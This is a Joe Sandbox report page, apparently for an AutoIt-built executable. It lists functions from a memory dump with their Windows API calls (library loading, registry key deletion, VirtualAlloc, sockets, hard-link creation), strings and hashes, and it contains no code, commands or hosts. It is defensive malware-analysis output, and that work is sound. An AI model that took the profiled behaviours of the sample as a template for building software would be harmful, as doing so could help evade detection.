Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: ef48ecb18a436e05db37f9bd72a0a8012c1650196e1ca53342ebfe7007becf24
Instruction ID: 28bc771e28de0fccc53113b18b17daf2a49ddbf989bb02bde296dcbee581e94b
Opcode Fuzzy Hash: ef48ecb18a436e05db37f9bd72a0a8012c1650196e1ca53342ebfe7007becf24
Instruction Fuzzy Hash: 9ED01730B10713DFDB209F75D95864A76E4AF09352B218C3EA596DA160EB70D8C0CA90

Function 00A14C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A14BD0,?,00A14DEF,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A14C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00A14C1D
kernel32.dll, xrefs: 00A14C0C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 006add76b72988cbbbe676683bc642457f977ea6410e523497836bcfbdbbc861
Instruction ID: fb0769dcd0cb1a67ccdd5b77f407d314a7d23c604c5fd3fafabc325a75ce417b
Opcode Fuzzy Hash: 006add76b72988cbbbe676683bc642457f977ea6410e523497836bcfbdbbc861
Instruction Fuzzy Hash: 54D01230611713DFDB209FB5D948A46B6D9EF09351B218C3E9485D6160EAB0D4C1C690

Function 00A90DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00A91039), ref: 00A90DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A90E07

Strings

RegDeleteKeyExW, xrefs: 00A90E01
advapi32.dll, xrefs: 00A90DF0

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 7daca8aff483be2d4b1636779d75db5857ab7d57a37df5402f3b1d46aa9dfbe3
Instruction ID: 1413c68468dca8d97d3d2488e0b71d30a0a8e0ef3c12aa8e11fc9e3fd511764e
Opcode Fuzzy Hash: 7daca8aff483be2d4b1636779d75db5857ab7d57a37df5402f3b1d46aa9dfbe3
Instruction Fuzzy Hash: 4CD01770610726DFDB209FB5D848B8776E5AF14392F228C7E9586D2160EAB4D890CA90

Function 00A890E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00A88CF4,?,00A9F910), ref: 00A890EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A89100

Strings

GetModuleHandleExW, xrefs: 00A890FA
kernel32.dll, xrefs: 00A890E9

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 9e4f28b3ed34c4867080dc72f3a9cf7b15f54295beb6f7b0d40981f833cb5151
Instruction ID: 2a6fcea3cd1d275333fba510a3ac687c4fd619e4ae84f885f6f06da3a13ac267
Opcode Fuzzy Hash: 9e4f28b3ed34c4867080dc72f3a9cf7b15f54295beb6f7b0d40981f833cb5151
Instruction Fuzzy Hash: 52D0E234A54723DFDB20AF71D85C61676E4AF05351B268D3E9586D65A0EB74C880CB90

Function 00A51714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A51718
__swprintf.LIBCMT ref: 00A51749

Strings

%.3d, xrefs: 00A51723
WIN_XPe, xrefs: 00A51788

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: aeee8f401265a5da22d0c50ab869ea42f7332272b4998594017b7b915392180d
Instruction ID: c23b03f099948b0e4463b490f9b6fa9f11c61c19c1db80cae82400ceed50a4cf
Opcode Fuzzy Hash: aeee8f401265a5da22d0c50ab869ea42f7332272b4998594017b7b915392180d
Instruction Fuzzy Hash: 22D01772948108FBCB009B949889EFA77BCBB0C312F142562B806E2040E2358B98EE21

Function 00A6717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c327298f4cb78a992bb90579d0e72fc6c243ff239b6ef22dedeef37e8f159af
Instruction ID: b31099e1469ff61fa69a33ff66a5760004d4dccccb3e2225bed38a1ed526b6aa
Opcode Fuzzy Hash: 2c327298f4cb78a992bb90579d0e72fc6c243ff239b6ef22dedeef37e8f159af
Instruction Fuzzy Hash: FDC16174A14216EFCB14CFA8C888EAEBBB5FF48718B158599E805DB351DB30DD81DB90

Function 00A8E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00A8E0BE
CharLowerBuffW.USER32(?,?), ref: 00A8E101

Part of subcall function 00A8D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00A8D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00A8E301
_memmove.LIBCMT ref: 00A8E314

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 30b931f8b74326e18f82e2cebbbaf7eaad84868f3cdcc34513ef59ccb2c0fbdc
Instruction ID: b9085f7c99f87aeedeef30206b0cd91abcb07374164b6a5240352a6f543bb616
Opcode Fuzzy Hash: 30b931f8b74326e18f82e2cebbbaf7eaad84868f3cdcc34513ef59ccb2c0fbdc
Instruction Fuzzy Hash: 06C13771A08301DFC714EF28C490A6ABBE4FF89754F14896EF8999B351D731E946CB82

Function 00A88093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A880C3
CoUninitialize.OLE32 ref: 00A880CE

Part of subcall function 00A6D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A6D5D4

VariantInit.OLEAUT32(?), ref: 00A880D9
VariantClear.OLEAUT32(?), ref: 00A883AA

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 5eba87e99c121c9f6cc1512752b7cbb8adf04ad62eb29d9fd5027e013248cca7
Instruction ID: 9eddb48ad714382652077d74783b686592c00ecbf22f745542ce3115fc3810e2
Opcode Fuzzy Hash: 5eba87e99c121c9f6cc1512752b7cbb8adf04ad62eb29d9fd5027e013248cca7
Instruction Fuzzy Hash: BAA164356047019FCB00EF64C991A6AB7E4FF89364F448418F99A9B3A2CF34ED41CB86

Function 00A67530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00AA2C7C,?), ref: 00A676EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00AA2C7C,?), ref: 00A67702
CLSIDFromProgID.OLE32(?,?,00000000,00A9FB80,000000FF,?,00000000,00000800,00000000,?,00AA2C7C,?), ref: 00A67727
_memcmp.LIBCMT ref: 00A67748

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 892edf5fe5f3bb1c0769bb77a73e9752b332db2567eeb4c78a644b487607d3bd
Instruction ID: dd266626d4de026c205444bec36b7c2a24de2b77de315b7084fe5017d228dccf
Opcode Fuzzy Hash: 892edf5fe5f3bb1c0769bb77a73e9752b332db2567eeb4c78a644b487607d3bd
Instruction Fuzzy Hash: E7810D75A10109EFCB04DFE8C984EEEB7B9FF89315F204558E506AB250DB71AE46CB60

Function 00A6687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A6688E
SysAllocString.OLEAUT32(00000000), ref: 00A66937
VariantCopy.OLEAUT32 ref: 00A66966
VariantClear.OLEAUT32(?), ref: 00A6698D

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 9994c8e9467980d3d57123b261d4e4fda15f395435832495b9d356add9514715
Instruction ID: e45568a94d54c42323031b3ce3ce244aea2a3cfb235dc2a17551905fa980e13f
Opcode Fuzzy Hash: 9994c8e9467980d3d57123b261d4e4fda15f395435832495b9d356add9514715
Instruction Fuzzy Hash: 9551A0757043029EDB24EFA5D8A1A6AB3F9EF55350F20D81FE596EB291DA70E880C701

Function 00A997F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0111E938,?), ref: 00A99863
ScreenToClient.USER32(00000002,00000002), ref: 00A99896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00A99903

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 081a18aff9e11a964f1a4053a9ebd14142c6f1ad92091eea7d0a23087c5fbd90
Instruction ID: 8157c543867d6f6c65fc0946c556a214e40d07a954b36006c0dad804293936c6
Opcode Fuzzy Hash: 081a18aff9e11a964f1a4053a9ebd14142c6f1ad92091eea7d0a23087c5fbd90
Instruction Fuzzy Hash: 03513C34A00209AFDF10CF68C984AAE7BF5FF55360F14816DF9659B2A0D730AD81DB90

Function 00A69A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00A69AD2
__itow.LIBCMT ref: 00A69B03

Part of subcall function 00A69D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00A69DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00A69B6C
__itow.LIBCMT ref: 00A69BC3

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 2b44b9d4377f9f2e88e875961ba9d9ab1d53068a2e6fc5ef3b34e2fbcdd0e03b
Instruction ID: e25606f29507d888ee2fad25f872364522d9d9c9959306cc06d461bd77a6ee61
Opcode Fuzzy Hash: 2b44b9d4377f9f2e88e875961ba9d9ab1d53068a2e6fc5ef3b34e2fbcdd0e03b
Instruction Fuzzy Hash: E1416D74A04208ABDF21EF54D946BFE7BBDEF48750F040069F905A7291DB709E84CBA1

Function 00A869AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00A869D1
WSAGetLastError.WSOCK32(00000000), ref: 00A869E1

Part of subcall function 00A19837: __itow.LIBCMT ref: 00A19862
Part of subcall function 00A19837: __swprintf.LIBCMT ref: 00A198AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A86A45
WSAGetLastError.WSOCK32(00000000), ref: 00A86A51

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: ebb217153fa82e3bd69ddd246076ba3e53af945e8a1f12bc5eb1188ec58e40af
Instruction ID: 4ed367b6b94985fd5af9067dfb586258dcac3ab68042b2b3815f7c87896a0851
Opcode Fuzzy Hash: ebb217153fa82e3bd69ddd246076ba3e53af945e8a1f12bc5eb1188ec58e40af
Instruction Fuzzy Hash: E441AE75740200AFEB60BF64DD96FBA77A89F04B54F048018FA59AB2C2DA749D41CB91

Function 00A8641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00A9F910), ref: 00A864A7
_strlen.LIBCMT ref: 00A864D9

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 396c3d6db2f82fd71197706ccfe21d4eddbd5e34fd4d68bd4e66e47d291a4e83
Instruction ID: fb8fc33f1da7068efb954bb54014ea723e609175ffee60de209e25097f264e8c
Opcode Fuzzy Hash: 396c3d6db2f82fd71197706ccfe21d4eddbd5e34fd4d68bd4e66e47d291a4e83
Instruction Fuzzy Hash: 1B419331A04104AFDB14FBA8DD96FEEB7B9AF44310F148155F81A9B292DB30EE45CB50

Function 00A7B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A7B89E
GetLastError.KERNEL32(?,00000000), ref: 00A7B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A7B8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A7B915

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: c818d33d1a3045abca38aa70cc30eac2459e7d88cc44fa1ad98d31339277fa00
Instruction ID: 6867bb92bc40712b4cb33f1e429f38e7d89849cb379ecb1b75121c9d65d91811
Opcode Fuzzy Hash: c818d33d1a3045abca38aa70cc30eac2459e7d88cc44fa1ad98d31339277fa00
Instruction Fuzzy Hash: 1E412839600610DFCB10EF15C594A9ABBE5EF4A310F19C099ED4AAB362CB30FD42CB95

Function 00A98851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A988DE

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 66153bdff29da4f2babc288a0524fab3a616d7b65f83a922bf3909c3cfe4c2c4
Instruction ID: 6ce4026e9f738fda52865cef8b21c6dd07cf0f512b7173c308d64b6289840bc2
Opcode Fuzzy Hash: 66153bdff29da4f2babc288a0524fab3a616d7b65f83a922bf3909c3cfe4c2c4
Instruction Fuzzy Hash: 6D319034701108AEEF209FA8CC45FB877F5EB07350F644116FA15EB2A1CE78D9409752

Function 00A9AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00A9AB60
GetWindowRect.USER32(?,?), ref: 00A9ABD6
PtInRect.USER32(?,?,00A9C014), ref: 00A9ABE6
MessageBeep.USER32(00000000), ref: 00A9AC57

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
